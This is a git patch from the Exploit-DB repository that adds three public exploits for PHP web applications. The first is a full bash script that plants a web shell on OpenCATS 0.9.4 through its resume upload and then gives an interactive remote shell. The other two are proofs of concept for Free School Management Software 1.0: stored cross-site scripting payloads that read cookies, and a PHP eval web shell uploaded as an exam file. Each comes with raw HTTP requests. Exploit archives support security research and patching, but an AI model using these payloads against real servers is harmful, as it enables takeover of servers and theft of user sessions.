From 55af36c59a073746d8edd219707815074966dd1c Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 11 Dec 2021 05:02:09 +0000
Subject: [PATCH] DB: 2021-12-11

3 changes to exploits/shellcodes

OpenCATS 0.9.4 - Remote Code Execution (RCE)
Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
Free School Management Software 1.0 - Remote Code Execution (RCE)
---
 exploits/php/webapps/50585.sh  | 154 +++++++++++++++++++++++++++++++++
 exploits/php/webapps/50586.txt | 106 +++++++++++++++++++++++
 exploits/php/webapps/50587.txt |  92 ++++++++++++++++++++
 files_exploits.csv             |   3 +
 4 files changed, 355 insertions(+)
 create mode 100755 exploits/php/webapps/50585.sh
 create mode 100644 exploits/php/webapps/50586.txt
 create mode 100644 exploits/php/webapps/50587.txt

diff --git a/exploits/php/webapps/50585.sh b/exploits/php/webapps/50585.sh
new file mode 100755
index 000000000..1134770cb
--- /dev/null
+++ b/exploits/php/webapps/50585.sh
@@ -0,0 +1,154 @@
+# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
+# Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
+# Date: 21/09/2021
+# Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
+# Vendor Homepage: https://www.opencats.org/
+# Software Link: https://github.com/opencats/OpenCATS
+# Version: <=0.9.4 Countach
+# Tested on: Debian, CentOS, Windows Server
+
+#!/bin/bash
+
+if [ $# -eq 0 ]
+then
+	echo "Usage: $0 <target URL>"
+	exit
+fi
+
+
+
+# if a payload doesn't work, try another
+
+payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
+#payload='GIF87a<?php echo exec($_REQUEST[0]); ?>'
+#payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>'
+#payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>'
+#payload='GIF87a<?php echo `$_REQUEST[0]`; ?>'
+#payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
+#payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>'
+
+target=$1
+
+green="\033[0;32m"
+red="\033[0;31m"
+reset="\033[0m"
+
+#====================== Functions
+
+rev() {
+while true
+	do echo -n -e "\n$ "
+	read cmd
+	curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"
+	done
+}
+
+upload() {
+	curl -skL $1/$2 \
+	-H "Connection: close" \
+	-F resumeFile=@"$3;type=application/x-php" \
+	-F ID="$firstJb" \
+	-F candidateID="-1" \
+	-F applyToJobSubAction="resumeLoad" \
+	--compressed \
+	--insecure
+}
+
+getVersion() {
+	ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
+
+	if [ -z "${ver}" ]
+	then
+		ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
+		if [ -z "${ver}" ]
+		then
+			echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
+			return 0
+		fi
+	fi
+	echo -e "${green}[*] Version detected: $ver${reset}"
+}
+
+writePayload(){
+
+	tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php"
+	file=`basename $tmpfile`
+	echo "$1" > $tmpfile
+}
+
+banner(){
+	echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d
+	echo -e "\n"
+}
+
+#======================
+
+banner
+
+echo "[*] Attacking target $target"
+
+echo "[*] Checking CATS version..."
+getVersion $target
+#exit
+
+echo "[*] Creating temp file with payload..."
+writePayload "$payload"
+
+#exit
+
+echo "[*] Checking active jobs..."
+
+jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'`
+numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'`
+firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`
+
+if [[ ! $numJb -gt 0 ]]
+then
+	echo -e "${red}[-] No active jobs found.${reset}"
+	echo "[*] Trying another path..."
+	jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`
+	numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`
+
+	if [[ ! $numJb -gt 0 ]]
+	then
+		echo -e "${red}[-] Couldn't find any active job.${reset}"
+		exit
+	fi
+fi
+
+firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`
+
+echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}"
+echo "[*] Sending payload..."
+
+req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`
+
+if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
+then
+	echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"
+	echo "[*] Checking by another method..."
+
+	sed -i "s/GIF87a//" $tmpfile
+
+	req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`
+
+	if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
+	then
+		echo -e "${red}[-] Couldn't upload payload...${reset}"
+		exit
+	fi
+fi
+
+echo -e "${green}[+] Payload $file uploaded!"
+echo "[*] Deleting created temp file..."
+rm $tmpfile
+echo "[*] Checking shell..."
+check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file")
+if `echo $check | grep -q "0x7359"`
+then
+	echo -e "${green}[+] Got shell! :D${reset}"
+	curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d"
+	rev $target/upload/careerportaladd/$file
+else
+	echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}"
+fi
\ No newline at end of file
diff --git a/exploits/php/webapps/50586.txt b/exploits/php/webapps/50586.txt
new file mode 100644
index 000000000..1e6cb51fa
--- /dev/null
+++ b/exploits/php/webapps/50586.txt
@@ -0,0 +1,106 @@
+# Exploit Title: Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
+# Exploit Author: fuzzyap1
+# Date: 7-12-2021
+# Category: Web application
+# Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip
+# Version: 1.0
+# Tested on: windows
+# Vulnerable page: http://localhost/admin/enquiry_category
+# Vulnerable Parameters: "category"
+
+Technical description:
+A stored XSS vulnerability exists in the Event management software. An
+attacker can leverage this vulnerability in order to run javascript on the
+web server surfers behalf, which can lead to cookie stealing, defacement
+and more.
+
+Steps to exploit:
+1) Navigate to http://localhost/admin/enquiry_category
+2) Insert your payload in the "category" parameter
+3) Click "save"
+
+Proof of concept (Poc):
+The following payload will allow you to run the javascript -
+"><img src=# onerror=alert(document.cookie)>
+
+---
+
+POST http://localhost/admin/enquiry_category/update/3 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------151631281127875309002088019539
+Content-Length: 490
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/admin/enquiry_category
+Cookie: CMSSESSID2cb149290396=0bd8mo7gisd21t9pl1ioorhl63;
+ci_session=6vl4s7keu1ucpoomv9tj4oe8an7kspa0
+Upgrade-Insecure-Requests: 1
+
+-----------------------------151631281127875309002088019539
+Content-Disposition: form-data; name="category"
+
+This is for ID 3 informa222tion"><img src=# onerror=alert(document.cookie)>
+-----------------------------151631281127875309002088019539
+Content-Disposition: form-data; name="purpose"
+
+Payment
+-----------------------------151631281127875309002088019539
+Content-Disposition: form-data; name="whom"
+
+Tutorial
+-----------------------------151631281127875309002088019539--
+
+---
+
+Steps to exploit:
+1) Navigate to http://localhost/admin/manage_profile
+2) Insert your payload in the "anme" parameter
+3) Click "save"
+
+Proof of concept (Poc):
+The following payload will allow you to run the javascript -
+"><img src=# onerror=alert('xss')>
+
+---
+
+POST /admin/manage_profile/update HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------13285163425854907563979323722
+Content-Length: 519
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/admin/manage_profile
+Cookie: ci_session=hiibl4e0oidvqier9b8hhfb5c1rl6l16
+Upgrade-Insecure-Requests: 1
+
+-----------------------------13285163425854907563979323722
+Content-Disposition: form-data; name="name"
+
+Administrator"><img src=# onerror=alert(document.cookie)>
+-----------------------------13285163425854907563979323722
+Content-Disposition: form-data; name="email"
+
+admin@admin.com
+-----------------------------13285163425854907563979323722
+Content-Disposition: form-data; name="userfile"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------13285163425854907563979323722--
+
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/50587.txt b/exploits/php/webapps/50587.txt
new file mode 100644
index 000000000..7d413a63c
--- /dev/null
+++ b/exploits/php/webapps/50587.txt
@@ -0,0 +1,92 @@
+# Exploit Title: Free School Management Software 1.0 - Remote Code Execution (RCE)
+# Exploit Author: fuuzap1
+# Date: 7-12-2021
+# Category: Web application
+# Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip
+# Version: 1.0
+# Tested on: windows
+# Vulnerable page: http://localhost/admin/examQuestion
+
+
+Technical description:
+A unrestricted file upload vulnerability exists in the Free school
+management software v1.0. An attacker can leverage this vulnerability in
+order to get a remote code execution on the affected web server. Once a php
+webshell containing "<?php system($_GET["cmd"]); ?>"  gets uploaded it is
+getting save  into /uploads/exam_question/ directory, and is accessible by
+all users.  the attacker can gain remote code execution on the web server.
+
+Steps to exploit:
+1) Navigate to http://localhost/admin/manage_profile
+2) click "ADD NEW QUESTION PAPER" edit base infomation
+3) uploading a php webshell containing "<?php system($_GET["cmd"]); ?>" in
+the Field  "upload Drag and drop a file here or click"
+3) Click "save"
+4) open  http://localhost/uploads/exam_question/cmd.php?cmd=phpinfo() then
+php code execution
+Proof of concept (Poc):
+The following payload will allow you to run the javascript -
+<?php system($_GET["cmd"]); ?>
+
+---
+POST /admin/examQuestion/create HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------183813756938980137172117669544
+Content-Length: 1331
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/admin/examQuestion
+Cookie: ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q
+Upgrade-Insecure-Requests: 1
+
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="name"
+
+test4
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="class_id"
+
+2
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="subject_id"
+
+5
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="timestamp"
+
+2021-12-08
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="teacher_id"
+
+1
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="file_type"
+
+txt
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="description"
+
+123123
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="_wysihtml5_mode"
+
+1
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="file_name"; filename="cmd.php"
+Content-Type: application/octet-stream
+
+<?php eval($_GET["cmd"]); ?>
+-----------------------------183813756938980137172117669544--
+---
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f25e60777..825c527b8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44669,3 +44669,6 @@ id,file,description,date,author,type,platform,port
 50581,exploits/multiple/webapps/50581.py,"Grafana 8.3.0 - Directory Traversal and Arbitrary File Read",1970-01-01,s1gh,webapps,multiple,
 50582,exploits/php/webapps/50582.txt,"Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass",1970-01-01,able403,webapps,php,
 50583,exploits/php/webapps/50583.txt,"Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)",1970-01-01,able403,webapps,php,
+50585,exploits/php/webapps/50585.sh,"OpenCATS 0.9.4 - Remote Code Execution (RCE)",1970-01-01,"Nicholas Ferreira",webapps,php,
+50586,exploits/php/webapps/50586.txt,"Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,fuzzyap1,webapps,php,
+50587,exploits/php/webapps/50587.txt,"Free School Management Software 1.0 - Remote Code Execution (RCE)",1970-01-01,fuzzyap1,webapps,php,